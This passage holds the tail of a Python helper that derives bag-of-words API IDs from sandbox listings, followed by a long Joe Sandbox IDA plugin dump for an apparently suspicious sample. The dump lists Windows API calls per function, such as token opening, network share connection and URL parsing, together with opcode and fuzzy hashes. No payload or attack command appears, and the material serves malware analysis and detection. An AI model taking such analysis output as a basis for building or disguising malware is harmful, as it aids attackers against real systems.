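STOPWORDS = {"Get", "To", "Rtl", "Def", "Dlg", "Pos", "Lib", "Ex", "For"}


def parse_api_lines(listing):
    """Return (api, module, ref, caller) for each call line. caller is the address
    of the subcall function on indented 'Part of subcall' lines, else None for
    calls made directly by the listed function."""
    calls = []
    for line in listing.splitlines():
        m = LINE_RE.match(line)
        if m:
            calls.append((m["api"], m["module"], m["ref"], m["caller"]))
    return calls


def api_words(api):
    """Words one API name contributes to the key. A trailing W/A charset suffix is
    dropped; names with no upper-case letters (_memmove, inet_ntoa) count whole;
    other names are split at capitals with STOPWORDS removed, which also discards
    all-caps CRT internals such as __FF_MSGBANNER (no Capitalised word in them)."""
    name = api[:-1] if len(api) > 1 and api[-1] in "WA" and api[-2].islower() else api
    if name == name.lower():
        return [name]
    return [w for w in re.findall(r"[A-Z][a-z]+", name) if w not in STOPWORDS]


def api_id(apis):
    """Bag-of-words key: words bucketed by occurrence count, highest count first,
    sorted bytewise inside a bucket (upper-case before '_' before lower-case),
    buckets joined with '$'. Call order and arguments play no part."""
    counts = Counter(w for api in apis for w in api_words(api))
    by_count = {}
    for word, n in counts.items():
        by_count.setdefault(n, []).append(word)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def api_id_for_listing(listing):
    """Parse an 'APIs' listing and return its API ID (subcall lines included)."""
    return api_id([api for api, _module, _ref, _caller in parse_api_lines(listing)])


def modules_called(listing):
    """Sorted set of modules the function and its subcalls reach; a cheap way to
    find the WSOCK32 / NTDLL users among thousands of listed functions."""
    return sorted({module for _api, module, _ref, _caller in parse_api_lines(listing)})


if __name__ == "__main__":
    for name, listing in SAMPLE_LISTINGS.items():
        print(f"{name:14s} {api_id_for_listing(listing):60s} {modules_called(listing)}")
```

Because the key ignores call order, arguments and everything outside the API names, two functions that reach the same set of imports collapse to one ID; that makes it a convenient pivot for finding the same routine in other samples, but a weak detection signature on its own. The Instruction Fuzzy Hash listed beside it is the value that reflects the code bytes.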
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction ID: 9a034e5334309b974e8ff62e6ef49d8d6ce818a3b8365febbbbf16542ef3955a
• Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction Fuzzy Hash: 42014B7244814EBFCF165E84DC01CEE3F62BF28355B59841AFB1898131D63ED9B1AB85
APIs
• GetWindowRect.USER32(?,?), ref: 0054B2E4
• ScreenToClient.USER32(?,?), ref: 0054B2FC
• ScreenToClient.USER32(?,?), ref: 0054B320
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054B33B
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: f345ed9dee9a90906183969f95f98221b52fe1b427e83ad2632f99117f2be3c1
• Instruction ID: 921ab8b8d4af9673791c0c9fef0ca09807fc7c0d6fbe096281127d86be218804
• Opcode Fuzzy Hash: f345ed9dee9a90906183969f95f98221b52fe1b427e83ad2632f99117f2be3c1
• Instruction Fuzzy Hash: 681174B9D00209EFDB01CFA9C8849EEBBF9FF19314F108166E914E3220D731AA659F51
APIs
• EnterCriticalSection.KERNEL32(?), ref: 00526BE6
  • Part of subcall function 005276C4: _memset.LIBCMT ref: 005276F9
• _memmove.LIBCMT ref: 00526C09
• _memset.LIBCMT ref: 00526C16
• LeaveCriticalSection.KERNEL32(?), ref: 00526C26
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: CriticalSection_memset$EnterLeave_memmove
• String ID:
• API String ID: 48991266-0
• Opcode ID: 03cd36328540366a0148c4aa4523150820716af37f54e49880cb005e5a8580eb
• Instruction ID: 0925ee491c9cc7b4fc6e513aae60544484a4eb5300e5f6ea78752ebcdf4008f2
• Opcode Fuzzy Hash: 03cd36328540366a0148c4aa4523150820716af37f54e49880cb005e5a8580eb
• Instruction Fuzzy Hash: 5FF0303A104114ABCF016F96EC89A8ABF29EF46325F048065FE085F266C775A811DBB4
APIs
• GetSysColor.USER32(00000008), ref: 004C2231
• SetTextColor.GDI32(?,000000FF), ref: 004C223B
• SetBkMode.GDI32(?,00000001), ref: 004C2250
• GetStockObject.GDI32(00000005), ref: 004C2258
• GetWindowDC.USER32(?,00000000), ref: 004FBE83
• GetPixel.GDI32(00000000,00000000,00000000), ref: 004FBE90
• GetPixel.GDI32(00000000,?,00000000), ref: 004FBEA9
• GetPixel.GDI32(00000000,00000000,?), ref: 004FBEC2
• GetPixel.GDI32(00000000,?,?), ref: 004FBEE2
• ReleaseDC.USER32(?,00000000), ref: 004FBEED
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
• Opcode ID: f11764d787efb727e2c9df9d973e5f53a0a7bb6b8b20eed338539d3c05b09776
• Instruction ID: db558d92d731d3e252fa922a5f782de4d1580a67591c0819bdcfe13984c9d237
• Opcode Fuzzy Hash: f11764d787efb727e2c9df9d973e5f53a0a7bb6b8b20eed338539d3c05b09776
• Instruction Fuzzy Hash: 40E03036504144EADB215F68EC0D7D93B10EB16336F008366FB69580E187B14584EB11
APIs
• GetCurrentThread.KERNEL32 ref: 0051871B
• OpenThreadToken.ADVAPI32(00000000,?,?,?,005182E6), ref: 00518722
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005182E6), ref: 0051872F
• OpenProcessToken.ADVAPI32(00000000,?,?,?,005182E6), ref: 00518736
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: 718db7aa038579743daef0d7b3b93648eab4d3da605cc298932727e94a34dbdb
• Instruction ID: a4252966ee82f808ed99042dfd6e144ef535a9b78704b6ce6e16c10e49185783
• Opcode Fuzzy Hash: 718db7aa038579743daef0d7b3b93648eab4d3da605cc298932727e94a34dbdb
• Instruction Fuzzy Hash: F3E0863A6152119BEB305FB45D0CBD73BACEF62796F144828B246CA080DA348889D750
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID:
• String ID: %U
• API String ID: 0-398713088
• Opcode ID: 89ad9156440b11216bd871cd2cb196bc59503b00613421d0d385a9623bf1b778
• Instruction ID: cdf2c4f1169efc215e497721d5720f99fa3e920237e32b4e8bf653c719611ef6
• Opcode Fuzzy Hash: 89ad9156440b11216bd871cd2cb196bc59503b00613421d0d385a9623bf1b778
• Instruction Fuzzy Hash: FFB18E799001099BCF94EF95C485FFEB7B5EB44314F11842FE902A7291DB389A82CB9D
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: __itow_s
• String ID: xbX$xbX
• API String ID: 3653519197-1216199179
• Opcode ID: 68c602f46d51fefb1c2189780106b8653f95c7b1ab15a0aa3ef179f861f8db3c
• Instruction ID: da3ddf98c2f0ca28bae05609050b1044604c483b860959732389ef9fb55f54ce
• Opcode Fuzzy Hash: 68c602f46d51fefb1c2189780106b8653f95c7b1ab15a0aa3ef179f861f8db3c
• Instruction Fuzzy Hash: DAB1AF74A00109EFDB14EF55C891EBABBB9FF58304F14855EFA459B291EB34E980CB60
APIs
  • Part of subcall function 004DFC86: _wcscpy.LIBCMT ref: 004DFCA9
  • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
  • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
• __wcsnicmp.LIBCMT ref: 0052B02D
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0052B0F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
• Opcode ID: 0a4aeaf5fb585e5cdf9bdffdc69c7c0dfd62f4b47697b3e1468f43423a03a3a5
• Instruction ID: 299c5f89dc210b5cc4bbb34ca245f61cf1738a6d47c71df13e9c0eda3a718f43
• Opcode Fuzzy Hash: 0a4aeaf5fb585e5cdf9bdffdc69c7c0dfd62f4b47697b3e1468f43423a03a3a5
• Instruction Fuzzy Hash: BB61B075A00224AFDB14DF99D895EAEBBB4FF09710F00406EF916AB291D730AE84CB54
APIs
• Sleep.KERNEL32(00000000), ref: 004D2968
• GlobalMemoryStatusEx.KERNEL32(?), ref: 004D2981
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 9b8b8e1d98aea3c087194fe3d2322c50dfedc23cf54201b3d2e171d08381cf81
• Instruction ID: 50df1ee9fcd4622b8d76280c1a7c40e7f7b2c0573ba0c94a0b361899e2b16199
• Opcode Fuzzy Hash: 9b8b8e1d98aea3c087194fe3d2322c50dfedc23cf54201b3d2e171d08381cf81
• Instruction Fuzzy Hash: 33516971418744ABD360EF15D885BAFB7E8FB95344F41485EF1D8420A1DB74892CCB6A
APIs
  • Part of subcall function 004C4F0B: __fread_nolock.LIBCMT ref: 004C4F29
• _wcscmp.LIBCMT ref: 00529824
• _wcscmp.LIBCMT ref: 00529837
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp$__fread_nolock
                                                                                                                      • String ID: FILE
                                                                                                                      • API String ID: 4029003684-3121273764
                                                                                                                      • Opcode ID: 02a95a42ecdf29738eae360ea6d046ac7b1ffe05566e94849fef79b7a2ddbfd8
                                                                                                                      • Instruction ID: 8ccc521a929834fc26af3ee9aaaca283c21c6fc1b8013e5af26bfb65f743ff64
                                                                                                                      • Opcode Fuzzy Hash: 02a95a42ecdf29738eae360ea6d046ac7b1ffe05566e94849fef79b7a2ddbfd8
                                                                                                                      • Instruction Fuzzy Hash: D141D875A0021ABADF219AA1DC45FEFBBBDEF86714F00046EF904A72C0D6759A04CB65
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID: DdX$DdX
                                                                                                                      • API String ID: 1473721057-2328636738
                                                                                                                      • Opcode ID: 4f5bc35f75eaddc5cd137270cda827750aa4cf44eee692abdfe105402e48f541
                                                                                                                      • Instruction ID: 5596c381823998227a3e04513dad83b458a49919866a804d7db1860204235433
                                                                                                                      • Opcode Fuzzy Hash: 4f5bc35f75eaddc5cd137270cda827750aa4cf44eee692abdfe105402e48f541
                                                                                                                      • Instruction Fuzzy Hash: 5C5121B86083058FDB90CF19C484B1ABBF1FB99358F54885EE8858B361D739EC95CB46
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0053259E
                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 005325D4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CrackInternet_memset
                                                                                                                      • String ID: |
                                                                                                                      • API String ID: 1413715105-2343686810
                                                                                                                      • Opcode ID: 37d2f371aa051f43c7f30d0762798127b5ea2b3f8c0285359d452232e704c274
                                                                                                                      • Instruction ID: 540ce8b6b7d7ba7ec5435f172c3ffad1a737de3c3dc75874fc42feafe5f751f6
                                                                                                                      • Opcode Fuzzy Hash: 37d2f371aa051f43c7f30d0762798127b5ea2b3f8c0285359d452232e704c274
                                                                                                                      • Instruction Fuzzy Hash: 57312A75801119ABCF41EFA5CC86EEEBFB8FF08314F10005AF914A6162EB355955DF60
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00547B61
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00547B76
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: '
                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                      • Opcode ID: 7a2d88449c0b7d40d39cda86540b464288e8d1b4f8b18fb6b28f77e4d0f24bf6
                                                                                                                      • Instruction ID: f8abe17fb2583d069f06509e017aa264b474db1f1abadf915802b40442d830bc
                                                                                                                      • Opcode Fuzzy Hash: 7a2d88449c0b7d40d39cda86540b464288e8d1b4f8b18fb6b28f77e4d0f24bf6
                                                                                                                      • Instruction Fuzzy Hash: 52410874A0520E9FDB14CF65C981BDABBB5FF08304F10056AE904EB351E770AA55DF90
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00546B17
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00546B53
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                      • Opcode ID: c25862db21186509949b50d6319e9e9030ef634fb348bcac218d3eb88003978a
                                                                                                                      • Instruction ID: 3186f7f59f328fc4c87a1ad7853918bc005561c5c2c32b34c3ca3da34d101fce
                                                                                                                      • Opcode Fuzzy Hash: c25862db21186509949b50d6319e9e9030ef634fb348bcac218d3eb88003978a
                                                                                                                      • Instruction Fuzzy Hash: 8E31BE71200604AEEB109F29CC80FFB7BA9FF49768F10861EF9A5D3190DA34AC81D761
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00522911
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0052294C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                      • Opcode ID: 218e855dc012ef60abd137cc1ba18bd7e4c3e97d15c46edff1af765a7cdc3e4d
                                                                                                                      • Instruction ID: b7a9c6c62f0fe2030125c07599c6f8e04db890a07afc0f9f7d7e66361238df52
                                                                                                                      • Opcode Fuzzy Hash: 218e855dc012ef60abd137cc1ba18bd7e4c3e97d15c46edff1af765a7cdc3e4d
                                                                                                                      • Instruction Fuzzy Hash: FC31C039A00319ABEB248F49E885BAEBFA8FF46350F140029ED81A61E0D77099C4CB11
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00546761
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0054676C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: Combobox
                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                      • Opcode ID: fe5e01c8d77ab604a1aff874a41135670c3fbc0869a63da8b09440e80e9a22af
                                                                                                                      • Instruction ID: 864a1103efc0856319bb9011112c5ea95758185f625b00d5c1f889e28c4356d7
                                                                                                                      • Opcode Fuzzy Hash: fe5e01c8d77ab604a1aff874a41135670c3fbc0869a63da8b09440e80e9a22af
                                                                                                                      • Instruction Fuzzy Hash: 4511BF75200208AFEF218F54DC80FFB3B6AFB8A3ACF114129F91897291D635EC5197A1
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004C1D73
                                                                                                                        • Part of subcall function 004C1D35: GetStockObject.GDI32(00000011), ref: 004C1D87
                                                                                                                        • Part of subcall function 004C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 004C1D91
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00546C71
                                                                                                                      • GetSysColor.USER32(00000012), ref: 00546C8B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                      • Opcode ID: 55014069a1f090bdca503b159a06fb2d4ed3e79cb9c804c9d0b098c1910d7e90
                                                                                                                      • Instruction ID: 6f5a4e07bb97f60b74ba922af4679edccb661d337791011cc26bc36bf9fff885
                                                                                                                      • Opcode Fuzzy Hash: 55014069a1f090bdca503b159a06fb2d4ed3e79cb9c804c9d0b098c1910d7e90
                                                                                                                      • Instruction Fuzzy Hash: 33211776520209AFDF04DFA8CC85EEA7BA8FB09318F014629FD95D2250E635E8509B61
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 005469A2
